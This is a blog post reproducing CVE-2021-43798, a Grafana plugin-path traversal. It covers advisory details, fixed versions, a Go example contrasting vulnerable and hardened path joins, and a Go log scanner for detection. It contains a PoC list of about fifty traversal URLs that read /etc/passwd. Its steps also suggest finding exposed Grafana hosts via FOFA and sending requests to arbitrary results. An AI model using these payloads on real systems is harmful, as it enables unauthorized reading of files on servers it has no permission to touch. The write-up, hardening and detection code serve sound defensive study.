wait's〔三生石畔〕 A good person, though lost while striving, will in the end realize that there is a right path. (Goethe)
[Vulnerability Reproduction] CVE-2021-43798 Grafana Arbitrary File Read
Posted: | Category: Incident Response | Comments: 0 | Views: 1994

Vulnerability information:
Arbitrary file read in Grafana. An attacker can exploit this vulnerability by sending a crafted HTTP request containing a directory traversal character sequence (../) to an affected device. An attacker who successfully exploits it can read arbitrary files on the target device's file system.

It has been verified that Grafana version 8.3.0 is still affected. Affected users are advised to block requests for the relevant exploit path as a temporary defense and to disable public Internet access to Grafana.

Basic information
CVE: CVE-2021-43798
Severity: High; CVSS score 7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Disclosure time: 2021-12-07 14:53:25

Update: On December 8, 2021, Grafana published a security advisory covering a path traversal affecting versions 8.0.0 - 8.3.0, assigned CVE-2021-43798. Grafana has released the fixed versions 8.3.1, 8.2.7, 8.1.8 and 8.0.7; affected users should upgrade to a fixed version as soon as possible.

Vulnerability impact
The vulnerability stems from improper sanitization of the path parameter in the Grafana function that serves public plugin assets, which lets an attacker exploit it by sending a crafted HTTP request containing a directory traversal character sequence (../) to an affected device. An attacker who successfully exploits it can read arbitrary files on the target device's file system.

Affected range
Grafana 8.x

Fix
Grafana has released security updates that address the vulnerability; affected users should upgrade to a fixed version as soon as possible:

Fixed versions:

Grafana 8.3.1
Grafana 8.2.7
Grafana 8.1.8
Grafana 8.0.7

References
https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p

Vulnerability principle
The vulnerable URL path is <grafana_host_url>/public/plugins/<plugin-id>/, where <plugin-id> is the plugin ID of any installed plugin.

Every Grafana instance ships with preinstalled plugins such as the Prometheus plugin or the MySQL plugin, so the following URLs are vulnerable on every instance:

  <grafana_host_url>/public/plugins/alertlist/
  <grafana_host_url>/public/plugins/annolist/
  <grafana_host_url>/public/plugins/barchart/
  <grafana_host_url>/public/plugins/bargauge/
  <grafana_host_url>/public/plugins/candlestick/
  <grafana_host_url>/public/plugins/cloudwatch/
  <grafana_host_url>/public/plugins/dashlist/
  <grafana_host_url>/public/plugins/elasticsearch/
  <grafana_host_url>/public/plugins/gauge/
  <grafana_host_url>/public/plugins/geomap/
  <grafana_host_url>/public/plugins/gettingstarted/
  <grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
  <grafana_host_url>/public/plugins/graph/
  <grafana_host_url>/public/plugins/heatmap/
  <grafana_host_url>/public/plugins/histogram/
  <grafana_host_url>/public/plugins/influxdb/
  <grafana_host_url>/public/plugins/jaeger/
  <grafana_host_url>/public/plugins/logs/
  <grafana_host_url>/public/plugins/loki/
  <grafana_host_url>/public/plugins/mssql/
  <grafana_host_url>/public/plugins/mysql/
  <grafana_host_url>/public/plugins/news/
  <grafana_host_url>/public/plugins/nodeGraph/
  <grafana_host_url>/public/plugins/opentsdb/
  <grafana_host_url>/public/plugins/piechart/
  <grafana_host_url>/public/plugins/pluginlist/
  <grafana_host_url>/public/plugins/postgres/
  <grafana_host_url>/public/plugins/prometheus/
  <grafana_host_url>/public/plugins/stackdriver/
  <grafana_host_url>/public/plugins/stat/
  <grafana_host_url>/public/plugins/state-timeline/
  <grafana_host_url>/public/plugins/status-history/
  <grafana_host_url>/public/plugins/table/
  <grafana_host_url>/public/plugins/table-old/
  <grafana_host_url>/public/plugins/tempo/
  <grafana_host_url>/public/plugins/testdata/
  <grafana_host_url>/public/plugins/text/
  <grafana_host_url>/public/plugins/timeseries/
  <grafana_host_url>/public/plugins/welcome/
  <grafana_host_url>/public/plugins/zipkin/
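Added example (written for this post; it is not Grafana's own handler code): a Go model of the bug class described above, with the vulnerable join beside a hardened one. The plugins root, the function names and the request strings are assumptions for the demo. It shows why filepath.Join on its own is not a confinement check: it cleans the ../ segments and hands back a path that lies outside the plugin directory.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// Constructed root for the demo; an assumption, not Grafana's real layout.
const pluginsRoot = "/var/lib/grafana/plugins"

var (
	ErrBadPluginID      = errors.New("plugin id must be a single plain path element")
	ErrOutsidePluginDir = errors.New("requested file resolves outside the plugin directory")
)

// unsafeAssetPath models the vulnerable pattern: plugin id and the rest of the
// request path are joined onto the plugins directory with no check on where the
// result lands. filepath.Join cleans ".." segments, so enough of them walk the
// path right out of pluginsRoot (an absolute path clamps at "/").
func unsafeAssetPath(pluginID, requested string) string {
	return filepath.Join(pluginsRoot, pluginID, requested)
}

// safeAssetPath resolves the same way but then verifies that the cleaned result
// still lies inside this plugin's own directory. The check is made on the
// resolved path, not on the raw request string, so any variant that normalises
// to the same place is treated the same way.
func safeAssetPath(pluginID, requested string) (string, error) {
	// The id must be one plain path element: no separators, not "." or "..".
	if pluginID == "" || pluginID == "." || pluginID == ".." || pluginID != filepath.Base(pluginID) {
		return "", ErrBadPluginID
	}
	pluginDir := filepath.Join(pluginsRoot, pluginID)
	full := filepath.Join(pluginDir, requested)
	rel, err := filepath.Rel(pluginDir, full)
	if err != nil {
		return "", err
	}
	// Anything whose relative form starts with ".." has escaped pluginDir.
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsidePluginDir
	}
	return full, nil
}

func main() {
	// The traversal shape used in this post's PoC list.
	req := "../../../../../../../../etc/passwd"
	fmt.Println("unsafe join serves:", unsafeAssetPath("alertlist", req))
	if _, err := safeAssetPath("alertlist", req); err != nil {
		fmt.Println("safe join rejects:", err)
	}
	p, _ := safeAssetPath("alertlist", "module.js")
	fmt.Println("safe join serves:", p)
}
```

The hardened version compares the resolved path against the plugin directory with filepath.Rel instead of searching the request for the literal "../", and it rejects plugin ids that are not a single plain element, so neither the id segment nor the remainder can carry the traversal.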

Verification steps
1. Search FOFA for "Grafana"
[screenshot]
2. Pick any result that meets the requirement (Grafana version number > 8.x) and send the request
[screenshot]
3. Attached PoC

  - "{{BaseURL}}/public/plugins/alertGroups/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/icon/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/alertmanager/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/annolist/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/barchart/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/bargauge/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/canvas/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/cloudwatch/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/dashboard/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/dashlist/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/debug/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/elasticsearch/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/gauge/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/geomap/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/gettingstarted/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/grafana/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/graph/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/graphite/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/heatmap/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/histogram/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/influxdb/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/jaeger/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/live/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/logs/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/loki/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/mixed/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/mssql/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/mysql/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/news/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/nodeGraph/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/opentsdb/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/piechart/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/pluginlist/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/postgres/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/prometheus/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/stat/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/state-timeline/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/status-history/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/table-old/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/table/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/tempo/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/testdata/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/text/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/timeseries/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/welcome/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/xychart/../../../../../../../../etc/passwd"
  - "{{BaseURL}}/public/plugins/zipkin/../../../../../../../../etc/passwd"
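Added example (not part of the original post): a Go scan over constructed reverse-proxy access-log lines that flags requests to /public/plugins/<id>/ which, after percent-decoding and path normalisation, no longer resolve inside that plugin's directory. The log format (nginx combined, assuming a proxy in front of Grafana), the sample lines and the function names are assumptions; the traversal shape is the one from the PoC list above.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"regexp"
	"strings"
)

// Hit is one flagged request.
type Hit struct {
	Client   string
	Time     string
	RawPath  string
	Resolved string // path after percent-decoding and "." / ".." normalisation
	Status   string
}

// Constructed sample log (nginx combined format); not real traffic.
var sampleLog = []string{
	`10.0.0.5 - - [08/Dec/2021:15:20:49 +0800] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 5120 "-" "Mozilla/5.0"`,
	`203.0.113.7 - - [08/Dec/2021:15:29:03 +0800] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1822 "-" "python-requests/2.26"`,
	`203.0.113.7 - - [08/Dec/2021:15:29:05 +0800] "GET /public/plugins/mysql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1822 "-" "python-requests/2.26"`,
	`10.0.0.9 - - [08/Dec/2021:15:31:12 +0800] "GET /api/health HTTP/1.1" 200 60 "-" "curl/7.79"`,
}

// client, timestamp, method, path, status
var logLine = regexp.MustCompile(`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})`)

// decodeFully undoes percent-encoding until the string stops changing (bounded),
// so single- and double-encoded dot segments are seen as the file system will.
func decodeFully(s string) string {
	for i := 0; i < 3; i++ {
		d, err := url.PathUnescape(s)
		if err != nil || d == s {
			break
		}
		s = d
	}
	return s
}

// isPluginTraversal reports whether a request path targets /public/plugins/<id>
// and, once normalised, no longer stays at or under that plugin directory.
// It returns the normalised path for the analyst alongside the verdict.
func isPluginTraversal(rawPath string) (string, bool) {
	if i := strings.IndexByte(rawPath, '?'); i >= 0 {
		rawPath = rawPath[:i] // query string is irrelevant to the file path
	}
	decoded := decodeFully(rawPath)
	const prefix = "/public/plugins/"
	if !strings.HasPrefix(decoded, prefix) {
		return "", false
	}
	id := strings.SplitN(strings.TrimPrefix(decoded, prefix), "/", 2)[0]
	resolved := path.Clean(decoded)
	if id == "" {
		return resolved, false
	}
	if id == "." || id == ".." {
		return resolved, true // the id segment itself is a traversal
	}
	pluginDir := prefix + id
	inside := resolved == pluginDir || strings.HasPrefix(resolved, pluginDir+"/")
	return resolved, !inside
}

// scanAccessLog parses each line and collects the flagged requests.
func scanAccessLog(lines []string) []Hit {
	var hits []Hit
	for _, l := range lines {
		m := logLine.FindStringSubmatch(l)
		if m == nil {
			continue
		}
		if resolved, bad := isPluginTraversal(m[4]); bad {
			hits = append(hits, Hit{Client: m[1], Time: m[2], RawPath: m[4], Resolved: resolved, Status: m[5]})
		}
	}
	return hits
}

func main() {
	for _, h := range scanAccessLog(sampleLog) {
		fmt.Printf("%s %s status=%s resolved=%s raw=%s\n", h.Time, h.Client, h.Status, h.Resolved, h.RawPath)
	}
}
```

The check normalises before comparing instead of matching the literal string "../", so percent-encoded and double-encoded forms are caught the same way as the plain one. Browsers collapse dot segments before sending a request, so a hit on this endpoint from a real client is a strong signal rather than noise, and the status column shows whether the server answered the request with content.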

END. A simple reproduction, recorded as notes. Be sure to check instances on the internal network as well, and don't forget it!!!